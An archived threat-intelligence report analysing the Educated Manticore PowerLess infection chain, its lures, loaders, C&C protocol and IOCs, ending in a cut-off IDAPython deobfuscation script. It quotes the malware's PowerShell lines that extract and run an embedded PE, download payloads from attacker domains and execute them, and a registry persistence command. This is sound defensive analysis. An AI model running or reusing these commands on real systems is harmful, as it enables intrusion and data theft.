{ "id": "077b6039-494c-4558-a620-00df04583f9a", "created_at": "2026-04-07T14:42:20.996533Z", "updated_at": "2026-04-10T03:36:00.851001Z", "deleted_at": null, "sha1_hash": "5ec3b3f1448dedc2380d507e89ff1ce32973c1ed", "title": "Educated Manticore – Iran Aligned Threat Actor Targeting Israel via Improved Arsenal of Tools", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 151553, "plain_text": "Educated Manticore – Iran Aligned Threat Actor Targeting Israel via\r\nImproved Arsenal of Tools\r\nBy etal\r\nPublished: 2023-04-25 · Archived: 2026-04-07 14:36:06 UTC\r\nKey Findings:\r\nIn this report we reveal new findings related to Educated Manticore, an activity cluster with strong overlap with\r\nPhosphorus, an Iranian-aligned threat actor operating in the Middle East and North America.\r\nLike many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly\r\nother archive files to initiate infection chains. In the report we reveal Iraq-themed lures, most likely used to target\r\nentities in Israel\r\nThe actor has significantly improved its toolset, utilizing rarely seen techniques, most prominently using .NET\r\nexecutables constructed as Mixed Mode Assembly – a mixture of .NET and native C++ code. It improves tools’\r\nfunctionality and makes the analysis of the tools to be more difficult.\r\nThe final executed payload is an updated version of the Implant PowerLess, previously tied to some of Phosphorus\r\nransomware operations.\r\nIntroduction\r\nIn this report, Check Point research reveals new findings of an activity cluster closely related to Phosphorus. The research\r\npresents a new and improved infection chain leading to the deployment of a new version of PowerLess. This implant\r\nwas attributed to Phosphorus in the past, an Iran-affiliated threat group operating in the Middle East and North America.\r\nPhosphorus has been linked to a wide variety of activities, ranging from ransomware to spear-phishing of high-profile\r\nindividuals.\r\nWhile the new PowerLess payload remains similar, its loading mechanisms have significantly improved, adopting\r\ntechniques rarely seen in the wild, such as using .NET binary files created in mixed mode with assembly code. The newly\r\ndiscovered version is likely intended for phishing attacks focused around Iraq, using an ISO file to initiate the infection\r\nchain. Other documents inside the ISO file were in Hebrew and Arabic languages, suggesting the lures were aimed at Israeli\r\ntargets.\r\nAs the details of this attack were uncovered, two other, very similar lures have drawn our research team’s attention. Based\r\non internal naming conventions and previous submissions, we assume with medium confidence that those lures were part of\r\ntesting efforts of the same threat actor.\r\nCheck Point Research tracks this activity cluster as Educated Manticore.\r\nPowerLess Infection Chain Analysis\r\nHigh-level Overview\r\nEducated Manticore deployment of PowerLess is a multi-staged process that contains several custom components:\r\nLure ( Iraq development resources.iso  as well as the documents within it)\r\nInitial Loader ( Iraq development resources.exe , later changed\r\nto  syscall01.exe )\r\nDownloader (stored encrypted within  zoom.jpg )\r\nPowerLess Loader ( syscall02.exe , downloaded by  zoom.jpg )\r\nPowerLess Payload (stored encrypted within  asdfg , downloaded by  zoom.jpg ).\r\nThe complete chain is depicted below:\r\nFigure 1 – High-level overview of Educated Manticore’s PowerLess infection chain\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 1 of 14\n\nISO and Lures\r\nThe file  Iraq development resources.iso  was submitted to VirusTotal by two submitters from Israeli IP addresses. At the\r\ntime of this writing, it has 0 detections, possibly affected by its large size (18.5 MB). It is worth noting that the initial loader\r\nembedded in the ISO file also has a low detection rate.\r\nFigure 2 - ISO image detections on VirusTotal\r\nFigure 2 – ISO image detections on VirusTotal\r\nThe ISO file is designed to deceive the user. Its structure is unique, containing a relatively large number of files in three\r\nhidden folders with names containing non-breaking spaces, in addition to the initial loader, disguised as a folder as well.\r\nA summary of the files in the ISO image:\r\nFigure 3 - Contents of ISO image\r\nFigure 3 – Contents of ISO image\r\nOf the three folders, the first contains an encrypted version of a custom downloader stored as  zoom.jpg . The second and\r\nthird are identical in terms of subfolder and file names, while one contains actual PDF lures and the other contains the same\r\nfiles XORed with  ‘0x0a’  in the decimal format. The lures were divided into subfolders by language, containing files in\r\nArabic, English, and Hebrew. All of them are PDF files with academic content about Iraq, suggesting the targets might have\r\nbeen academic researchers.\r\nFigure 4 - PDF lures\r\nFigure 4 – PDF lures\r\nWhat might appear in the picture as a fourth folder is actually the initial loader, a PE file named  Iraq development\r\nresources.exe  that is disguised as an empty folder, prompting users to click it\r\nwithout noticing its extension.\r\nInitial Loader\r\nIraq development resources.exe  is the first malicious component that initiates the infection chain upon execution. It is a\r\n64-bit PE designed to decrypt and execute a custom downloader from the file  zoom.jpg  that is embedded in the ISO file as\r\nwell, using the open-source project RunPE-In-Memory.\r\nThe Initial loader itself is obfuscated, most likely with compiler-generated pattern-based obfuscation. In this case, the\r\nobfuscation resulted in about 1282 blocks full of junk code. Appendix “A” provides a dedicated IDAPython script we\r\ncreated to de-obfuscate the code.\r\nFigure 5 - Comparison between code flow before and after de-obfuscation\r\nFigure 5 – Comparison between code flow before and after de-obfuscation\r\nTo make the analysis even more difficult, the actors have implemented an additional layer of 13 customized string-decryption functions that are based on TEA32 (Tiny-Encryption-Algorithm), where each function uses a different\r\ndecryption key and is implemented to work on a certain length of the string. Appendix “B” provides a dedicated IDAPython\r\nscript we created to decrypt the code.\r\nUpon execution, the initial loader:\r\n1. Creates the directory  C:\\Users\\User\\AppData\\Local\\SystemCall .\r\n2. Copies itself with the name  syscall01.exe  to the above folder. The malware also attempts to copy  zoom.jpg  to\r\nthe same folder, but fails because of improper handling of spaces.\r\n3. Constructs the path to the file  zoom.jpg , stored in a non-breaking space folder ( \\\\\\xA0 ) in the ISO image, as\r\ndepicted below:\r\nFigure 6 - Invoking zoom.jpg in memory using RunPE-In-Memory\r\nFigure 6 – Invoking zoom.jpg in memory using RunPE-In-Memory\r\n4. Decrypts the contents of the downloader to memory from  zoom.jpg  using AES-256-CBC with the KEY\r\nqweasdzxcrtyfghvqweasdzxcrtyfghv and IV  ddssajliodqsdedw . The decryption is implemented in a custom\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 2 of 14\n\nversion of RunPE-In-Memory, built to handle the encrypted payload, map it to memory, and execute it at its entry\r\npoint, as seen below, compared to the original project code.\r\nFigure 7 - Comparison between publicly available RunPE-In-Memory and Educated Manticore version\r\nFigure 7 – Comparison between publicly available RunPE-In-Memory and Educated Manticore version\r\nDownloader\r\nThe decrypted file extracted from  zoom.jpg  is 64-bit PE with the main purpose of downloading and executing the next\r\nstages. The downloader is obfuscated similar to the initial loader, affected with the same compiler-generated pattern-based\r\nobfuscation, and can also be de-obfuscated with the same script provided in Appendix “A”. The string decryption is also\r\nimplemented similarly, but this time using 16 different customized string-decryption functions based on TEA32 (Tiny-Encryption-Algorithm).\r\nAfter it is loaded into memory and run, the downloader:\r\n1. Starts Explorer in one of the “iso” subfolders, imitating a real folder opening.\r\n2. Creates a persistence for  syscall01.exe  (the newly created copy of the initial loader) by setting the registry value\r\nHKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell . The persistence is configured only if the\r\nmalware does not run from the  AppData  directory and if  syscall01.exe  does not exist in the\r\nfolder  C:\\Users\\User\\AppData\\Local\\SystemCall .\r\nIn the flow described above, this persistence is not configured, because the  syscall01.exe  is created in a previous\r\nstage exactly in the folder  C:\\Users\\User\\AppData\\Local\\SystemCall , indicating of possible different execution\r\nflow use-case of this downloader.\r\n3. Downloads the PowerLess loader through a POST request to an attacker-controlled domain\r\nhttps://subinfralab[.]info/qaMspFbEmg , saving the file as\r\nC:\\Users\\User\\AppData\\Local\\SystemCall\\syscall02.exe .\r\n4. Downloads the encrypted PowerShell payload content through a POST request to the same server\r\nhttps://subinfralab[.]info/hgAdDiLmnB , saving as  C:\\Users\\Public\\asdfg .\r\nFigure 8 - Payload downloaded from attacker-controlled domain\r\nFigure 8 – Payload downloaded from attacker-controlled domain\r\n5. Executes the PowerLess loader through the command  explorer\r\nC:\\Users\\User\\AppData\\Local\\SystemCall\\syscall02.exe .\r\nPowerLess Loader\r\nThe downloaded executable file  syscall02.exe , dubbed as the “PowerLess Loader”, is a 64-bit .NET PE constructed\r\nas Mixed Mode Assembly. It is designed to load the encrypted PowerShell script backdoor  asdfg , dubbed as “PowerLess\r\nPayload”, decrypt it, and invoke it in memory. In addition, it also performs a few evasion techniques, such as AMSI\r\nBypass and ETW Bypass.\r\nRight upon the first inspection of the PE structure, a few characteristics point to this .NET sample being constructed as\r\nMixed-Mode Assembly. The “IL Only” flag inside the .NET directory flags is not checked. This means that the sample\r\ncould contain not only IL code, but also unmanaged code. In addition, the Import Directory contains a set of entries for\r\nnative libraries.\r\nFigure 9 - Inspection of unique .NET elements - “IL Only” flag not check and imported native libraries\r\nFigure 9 – Inspection of unique .NET elements – “IL Only” flag not check and imported native libraries\r\nReverse-engineering a mixed-mode assembly code is different from pure .NET assembly code, requiring both native and IL\r\ncode disassemblers. The native CRT entry point  mainCRTStartup() redirects the execution back to the managed code –\r\ndirectly to the method  main() , where all logic resides. The construction of certain strings is the first logic observed in this\r\nmethod. Recreating these strings reveals functionality related to the evasion techniques AMSI Bypass and ETW Bypass, as\r\nwell as keys and paths required to invoke the PowerLess payload later.\r\nFigure 10 - Reconstruction of AMSI and ETW bypasses related strings\r\nFigure 10 – Reconstruction of AMSI and ETW bypasses related strings\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 3 of 14\n\nFollowing the execution of the bypasses mentioned above, the loader reads the contents of the file stored\r\nin  C:\\Users\\Public\\asdfg , previously downloaded by the downloader. For the decryption, AES-128-ECB with the\r\npreviously constructed key  {}nj45kdada0slfk  is used. Once the PowerLess Payload  asdfg  is decrypted, it is executed\r\nin-memory in the context of  syscall02.exe , using an instance of class  System.Management.Automation.PowerShell  and\r\nthe applicable methods.\r\nFigure 11 - Invocation of PowerShell payload extracted from the file C:\\Users\\Public\\asdfg\r\nFigure 11 – Invocation of PowerShell payload extracted from the file C:\\Users\\Public\\asdfg\r\nPowerLess Payload\r\nThe final payload is a new version of the previously reported PowerLess PowerShell payload. This version, however, is\r\nmore mature, supporting a much wider set of commands. It contains an internal configuration, including its Command and\r\nControl server (C\u0026C), using the previously mentioned attacker-owned domain  subinfralab[.]info .\r\nFigure 12 - PowerLess configuration\r\nFigure 12 – PowerLess configuration\r\nA short inspection of the supported commands in the newer version in comparison to the ones in the previously reported\r\nsample provides insight into the significant development the payload has gone through. Among the new features – showing\r\nthe list of installed programs, showing the list of processes, showing a list of files, stealing user data from the Telegram\r\ndesktop app, and taking screenshots.\r\nPrevious Version Current Version\r\nBrowser\r\nCommand\r\nDownload\r\nKill\r\nOperation\r\nBrowser\r\nCommand\r\nDownload\r\nIndex\r\nMulti\r\nOperation\r\nProc\r\nProg\r\nShot\r\nSound\r\nTele\r\nupdate\r\nUpload\r\nAmong its capabilities, PowerLess can download extra modules, including a keylogger, browser information stealer, and a\r\nsurroundings sound recorder. Previous reports have linked a similar sound recording tool to PowerLess actors, but since\r\nthen, they embed it within the malware and activate it upon the “sound” command from the C\u0026C server. The tool is\r\ndownloaded from the server and saved as  C:\\Windows\\temp\\ugt\\so.zip .\r\nFigure 13 - Newly embedded “sound” command as seen in PowerLess payload\r\nFigure 13 – Newly embedded “sound” command as seen in PowerLess payload\r\nPowerLess C\u0026C communication to the server is Base64-encoded and encrypted after obtaining a key from the server. To\r\nmislead researchers, the threat actor actively adds three random letters at the beginning of the encoded blob.\r\nThe backdoor starts by initiating a request to receive the communication encryption key from the C\u0026C server:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\",\"GroupName\":\"SLM\",\"type\":\"fetchkey\"}\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 4 of 14\n\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\",\"GroupName\":\"SLM\",\"type\":\"fetchkey\"}\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\",\"GroupName\":\"SLM\",\"type\":\"fetchkey\"}\r\nIn response, the C\u0026C server sends a key and a “first-time” flag:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{ \"Key\" : \"X9w4tpLJErwNCKYA\", \"first\" : \"1\" }\r\n{ \"Key\" : \"X9w4tpLJErwNCKYA\", \"first\" : \"1\" }\r\n{ \"Key\" : \"X9w4tpLJErwNCKYA\", \"first\" : \"1\" }\r\nIn the first run, the PowerShell backdoor enumerates the system and sends recon data nested in “info”, including the\r\ncomputer name, username, operating system, IP address, installation path, computer manufacturer, and security software\r\ninstalled:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\", \"type\":\"sendinfos\", \"info\":\u003cEncrypted and encoded information\r\nin the JSON format\u003e}\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\", \"type\":\"sendinfos\", \"info\":\u003cEncrypted and encoded information\r\nin the JSON format\u003e}\r\n{\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\", \"type\":\"sendinfos\", \"info\":\u003cEncrypted and encoded information in\r\nIn addition, the backdoor sends the list of processes and programs from the victim’s computer. After sending the relevant\r\ninformation, the backdoor begins to check periodically every 48 to 72 seconds for commands from the C\u0026C server using\r\nthe  fetchcommand  request:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"type\":\"fetchcommand\",\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\"}\r\n{\"type\":\"fetchcommand\",\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\"}\r\n{\"type\":\"fetchcommand\",\"BotId\":\"1D1FB0BB21B94FC0B017A4DADA231E17\"}\r\nThe first command received from the C\u0026C server achieves persistence on the victim’s computer by adding the\r\nkey  shell  with the value  syscall02.exe  to the  winlogon  registry key. The persistence command is followed by a\r\ncommand to get logical disk names. The commands, separated by  ** , are sent immediately after the connection is\r\nestablished, which leads us to believe that it is an automated process:\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 5 of 14\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n{\"Cid\" : \"29\" , \"Command\" : \"reg add 'hkcu\\software\\microsoft\\windows NT\\currentversion\\winlogon' /v 'Shell' /d\r\n'explorer.exe, C:\\Users\\admin\\AppData\\Local\\SystemCall\\syscall02.exe' -f\" , \"CommandType\" :\"Command\"}\r\n{\"Cid\" : \"30\" , \"Command\" : \"wmic logicaldisk get name\" , \"CommandType\" :\"Command\"}\r\n{\"Cid\" : \"29\" , \"Command\" : \"reg add 'hkcu\\software\\microsoft\\windows NT\\currentversion\\winlogon' /v 'Shell' /d\r\n'explorer.exe, C:\\Users\\admin\\AppData\\Local\\SystemCall\\syscall02.exe' -f\" , \"CommandType\" :\"Command\"} {\"Cid\" : \"30\"\r\n, \"Command\" : \"wmic logicaldisk get name\" , \"CommandType\" :\"Command\"}\r\n{\"Cid\" : \"29\" , \"Command\" : \"reg add 'hkcu\\software\\microsoft\\windows NT\\currentversion\\winlogon' /v 'Shell' /\r\n{\"Cid\" : \"30\" , \"Command\" : \"wmic logicaldisk get name\" , \"CommandType\" :\"Command\"}\r\nThe Educated Manticore Apprentice\r\nWhile analyzing the newly discovered PowerLess lures, the CPR team came across a different intrusion set that shares\r\nseveral characteristics with the attack chain described above. This intrusion set consists of two archive files:\r\n1. iraq-project.rar  contains the LNK file  Iraq-project.lnk  and the folder  Other-files . This folder contains\r\nseveral PDF files with an Iraq-related theme and a DLL file stored as a false JPG file.\r\n2. SignedAgreement.zip  contains an LNK file  SignedAgreement.lnk\r\nFigure 14 - Summary of two suspicious infection chains\r\nFigure 14 – Summary of two suspicious infection chains\r\nAlthough there is no clear technical overlap between the PowerLess activity and this intrusion set with the two archive files,\r\nthey are likely related. Among the similarities between the two different intrusion sets:\r\nBoth intrusion sets are themed around Iraq and utilize the same PDF file, contained in the archives and the ISO image\r\n–  Governance_and_Development_in_Iraq.pdf .\r\nTwo different submitters, both of them from Israel, have submitted files related to the ISO and the archives intrusion\r\nsets, in proximity, indicating the two submitters had access to both sets.\r\nBoth campaigns utilize the open-source project RunPE-In-Memory.\r\nIt is evident that the second campaign is incomplete and might have been part of a personal project conducted by its\r\ndeveloper, as indicated by the PDB path  D:\\Personal Cmp\\personal project\\WorkSpace\\PROJREV\\aa\\  that appears in some\r\nof the samples. It is likely that this “personal project” was developed in the same context of the PowerLess lure described\r\nabove and might have taken inspiration from it or influenced it.\r\nInfection Chain –  iraq-project.rar\r\nThe LNK file stored in the RAR archive executes a PowerShell script that extracts the XORed PE file from the LNK file and\r\nruns it. This PE file then downloads two files from the C\u0026C server. At the time of our analysis, the payloads were no longer\r\navailable for download. Other artifacts retrieved throughout the analysis of the second lure,  SignedAgreement.zip , as well\r\nas additional files found on VirusTotal, lead us to believe that one downloaded file is the backdoor, while the second file is\r\nused to run it in memory.\r\nLNK Analysis\r\nClicking the malicious LNK file triggers a PowerShell script that extracts a PE file embedded within it, saving it to\r\nthe  %temp%  folder. The script then executes the extracted file. Additionally, the\r\nfile  Governance_and_Development_in_Iraq.jpg  is saved to the  %temp%  folder as  Newtonsoft.Json.dll\r\nPlain text\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 6 of 14\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00005A54} | Select-Object -ExpandProperty Name; $file =\r\ngc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp\\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 003156)) -\r\nEncoding Byte; $bytes2 = gc .\\Other-files\\Governance_and_Development_in_Iraq.jpg -Encoding Byte; $path2 =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp\\' + 'Newtonsoft.Json' + '.dll'; sc $path2 ([byte[]]($bytes2)) -Encoding Byte; \u0026 $path;\r\n$lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00005A54} | Select-Object -ExpandProperty Name; $file =\r\ngc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp\\tmp' + (Get-Random) + '.exe'; sc $path ([byte[]]($file | select -Skip 003156)) -\r\nEncoding Byte; $bytes2 = gc .\\Other-files\\Governance_and_Development_in_Iraq.jpg -Encoding Byte; $path2 =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp\\' + 'Newtonsoft.Json' + '.dll'; sc $path2 ([byte[]]($bytes2)) -Encoding Byte; \u0026 $path;\r\n$lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x00005A54} | Select-Object -ExpandProperty Name\r\ntmp1940166302.exe\r\ntmp1940166302.exe  runs a PowerShell script to download two files from the C\u0026C server and executes them. It is worth\r\nnoting that the file names change randomly with each EXE run.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf'; $wc = New-Object\r\nSystem.Net.WebClient; $bytes =\r\n$wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e7\r\nsc $path ([byte[]]($bytes)) -Encoding Byte; \u0026 C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe'; $wc = New-Object\r\nSystem.Net.WebClient; $bytes =\r\n$wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e72\r\nfor($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^\u0026\r\nC:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe;\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf'; $wc = New-Object\r\nSystem.Net.WebClient; $bytes =\r\n$wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/i/34624051816246d4a1a7f225d966d139/7e58169ee59d46e7a2be023e7\r\nsc $path ([byte[]]($bytes)) -Encoding Byte; \u0026 C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf /c powershell -WindowStyle\r\nhidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe'; $wc = New-Object System.Net.WebClient; $bytes =\r\n$wc.DownloadData('https://deersharpfork.info/dw85fgxtvzq/download/f/bb14611f7aae441fb78f2ca919b800b5/7e58169ee59d46e7a2be023e72\r\nfor($i = 0; $i -lt $bytes.count; $i++) {$bytes[$i] = $bytes[$i] -bxor 0x25 }; sc $path ([byte[]]($bytes)) -Encoding Byte; ^\u0026\r\nC:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe;\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.0.pdf'; $wc = New-Object Sys\r\n/c powershell -WindowStyle hidden $path = 'C:\\Users\\User\\AppData\\Local\\Temp\\s6b4.1.exe'; $wc = New-Object Sys\r\nThe file PDB path suggests it might have been part of a personal project:\r\nD:\\Personal Cmp\\personal project\\WorkSpace\\PROJREV\\aa\\ImageLoderFinal\\x64\\Release\\ImageLoderFinal.pdb .\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 7 of 14\n\nPivoting from this path, three additional samples surfaced, all named  AgentFinal.exe . These samples were all uploaded to\r\nVirusTotal on the same day and are different versions of the same payload. The payload seems to be a relatively immature\r\nversion of an implant, only capable of communicating with the C\u0026C server and executing commands.\r\nThe domain used in the payload,  blackturtle.hopto[.]org , resolves to the same IP address as the\r\ndomain  deersharpfork[.]info that was used in the infection chain. Furthermore, the  AgentFinal.exe  payload uses\r\nthe  Newtonsoft.Json.dll  library from the original archive.\r\nBased on this information, it is likely that the final payload in this infection chain is a .NET payload with similar capabilities\r\nto  AgentFinal.exe .\r\nSignedAgreement.zip\r\nThe additional archive found closely resembles  Iraq-project.rar  in terms of its infection chain and implementation, with\r\nthe only exception being the use of a DLL file instead of an EXE file. Nevertheless, both PE files have the same objective of\r\ndownloading two files from the C\u0026C server.\r\nSimilar to  Iraq-project.rar , the final payloads for this infection chain were not available at the time of our analysis.\r\nHowever, one of the downloaded files,  wmaess.exe , was submitted to VirusTotal. This file is utilized to run the PE file in\r\nmemory. When executed by the DLL, it receives the second downloaded file from the C\u0026C server,  WinMAPI.exe , as an\r\nargument.\r\nThe samples within this archive are reaching out to the same C\u0026C server –  deersharpfork[.]info .\r\nAttribution\r\nSince 2021, a new cluster of activity with clear ties to Iran has caught the attention of the Threat Intelligence community.\r\nThe aggressive nature of the new threat, in combination with their ties to ransomware deployments, led to a thorough\r\nanalysis of its activities. It was commonly called Nemesis Kitten, TunnelVision or Cobalt Mirage.\r\nWhat started as an extremely loud campaign, targeting networks opportunistically, was soon exposed as tied to previously\r\nreported Iranian threat actors, most prominently with those who align to some extent with APT35, Charming Kitten, or\r\nPhosphorus. Although different in nature and targeting, it shared some characteristics with the well-known actors, including\r\ninfrastructure, indicating a possible common organization affiliation.\r\nAs the activity evolved, the ties between the different clusters became harder to untangle. While the two ends on the\r\nspectrum of those activities differ significantly, not once has the threat intelligence community stumbled upon an activity\r\nthat does not easily fit the known clusters. Our previous report described one of those samples and the overlaps between the\r\nLog4J exploitation activity to an Android app previously tied to APT35.\r\nBecause we have no sufficient knowledge to place the activities around the PowerLess backdoor in this complex puzzle, we\r\nhave decided to track this activity separately based on a new naming convention adopted by Check Point Research.\r\nAccording to the new convention, labeling threats as mythical creatures, Iranian-aligned threats are Manticores.\r\nBecause the lures in the activity described in this report were academic in nature and because overlapping activities often\r\npursue similar targets, we have decided to name this actor Educated Manticore.\r\nConclusion\r\nIn this report, we analyzed newly discovered infection chains attributed to Educated Manticore, a threat actor aligned with\r\nthe Iranian state interests. Based on Check Point Research observations, as demonstrated in this report, Educated Manticore\r\ncontinues to evolve, refining previously observed toolsets and delivering mechanisms.\r\nAnalysis of the new PowerLess variant suggests the actor adopts popular trends to avoid detection, such as using archive\r\nfiles and ISO images. In parallel to adopting these trends, they keep developing custom toolsets using advanced techniques,\r\nsuch as .NET binaries using Mixed Mode Assembly.\r\nThe variant described in this report was delivered using ISO files, indicating it is likely meant to be the initial infection\r\nvector. Because it is an updated version of previously reported malware, PowerLess, associated with some of Phosphorus’\r\nRansomware operations, it is important to note that it might only represent the early stages of infection, with significant\r\nfractions of post-infection activity yet to be seen in the wild.\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 8 of 14\n\nCheck Point Customers remain protected against the threat described in this research.\r\nCheck Point Threat Emulation provides Comprehensive coverage of attack tactics, file-types, and operating systems.\r\nHarmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security\r\nbreaches and data compromise.\r\nIOCs\r\nC\u0026C domains\r\nsubinfralab[.]info\r\ndeersharpfork[.]info\r\nblackturtle.hopto[.]org\r\nHashes\r\nArchives\r\n3e1ed006e120a1afaa49f93b4156a992f8d799b1888ca6202c1098862323c308\r\n29318f46476dc0cfd7b928a2861fea1b761496eb5d6a26040e481c3bd655051a\r\n13bab4e32cd6365dba40424d20525cb84b4c6d71d3c5088fe94a6cfe07573e8e\r\n6e842691116c188b823b7692181a428e9255af3516857b9f2eebdeca4638e96e\r\nbc8f075c1b3fa54f1d9f4ac622258f3e8a484714521d89aa170246ce04701441\r\n706510916cfc7624ec5d9f9598c95570d48fa8601eecbbae307e0af7618d1460\r\nPE files\r\ne5ba06943abb666f69f757fcd591dd1cceb66cad698fb894d9bc8911282198c4\r\n97a615e69c38db9dffda6be7c11dd27547ce4036a4998a1469fa81b548c6f0b0\r\ne5016dfeae584de20a90f1bef073c862028f410d5b0ae4c074a696b8f8528037\r\n5704bc31061c7ca675bb9d56b9b56a175bf949accf6542999b3a7305af485906\r\n4fcde8ec5983cf1465ff7dbcd7d90fcd47d666b0b8352db1dcd311084ed1b3e8\r\n7cc9d887d47f99ca37d2fee6171067df70b4417e96fdb661b9fef697124444cc\r\nbdb2a12f2f84c3742240b8b9e1d6638a73c6b8752aff476051fe33a0bb408010\r\n5d216f5625caf92d224200647147d27bb79e1cff6c8a9fbcac63f321f6bbf02b\r\n62d0b8b5d4281ce107c43d36f222680b0cc85844b8973b645095ccdfb128454d\r\nLNK\r\n1672a14a3e54a127493a2b8257599c5582204846a78521b139b074155003cba4\r\n0f4d309f0145324a6867108bb04a8d5d292e7939223d6d63f44e21a1ce45ce4e\r\nPowerShell\r\n737cb075ba0b5ed6d8901dcd798eecff0bc8585091bc232c54f92df7f9e9e817\r\ncd813d56cf9f2201a2fa69e77fb9acaaa37e64183c708de64cb5cb7c3035a184\r\nc0de9b90a0ac591147d62864264bf00b6ec17c55f7095fdf58923085fe502400\r\n59a4b11b9fb93e3de7c27c25258cec43de38f86f37d88615687ab8402e4ae51e\r\nAppendix A – IDAPython script to de-obfuscate the Educated Manticore binary files\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nimport idaapi, idc, idautils\r\ndef NopRange(startEa, endEa):\r\nhttps://research.checkpoint.com/2023/educated-manticore-iran-aligned-threat-actor-targeting-israel-via-improved-arsenal-of-tools/\r\nPage 9 of 14\n\nfor b in range(startEa,endEa):\r\nidc.patch_byte(b,0x90)\r\ndef DetectJunkBB(bb: idaapi.BasicBlock):\r\nglobal BBJunkCount\r\nglobal BBsJunk\r\nfor head in idautils.Heads(bb.start_ea, bb.end_ea):\r\nif(idc.get_operand_type(head,1) == idc.o_imm and (idc.get_operand_value(head,1) \u0026 0xffffffff) == 0x9e3779b9):\r\nBBsJunk.append(bb)\r\nBBJunkCount += 1\r\nfor bbSS in bb.succs():\r\nif(bbSS.start_ea == bb.start_ea):\r\ncontinue\r\nif (not [SShead for SShead in idautils.Heads(bbSS.start_ea, bbSS.end_ea) if idc.print_insn_mnem(SShead) == \"call\"]):\r\nBBsJunk.append(bbSS)\r\nBBJunkCount += 1\r\nreturn\r\nBBJunkCount = 0\r\nBBsJunk = []\r\nfuncs = idautils.Functions()\r\nfor funcAddr in funcs:\r\nfunc = idaapi.get_func(funcAddr)\r\nfChart = idaapi.FlowChart(func, None, idaapi.FC_PREDS | idaapi.FC_NOEXT)\r\nfor bb in fChart:\r\nDetectJunkBB(bb)\r\nfor bb in BBsJunk:\r\nNopRange(bb.start_ea, bb.end_ea)\r\nprint(\"Cleaned BBs with JUNK code: %d\" % (BBJunkCount))\r\nimport idaapi, idc, idautils def NopRange(startEa, endEa): for b in range(startEa,endEa): 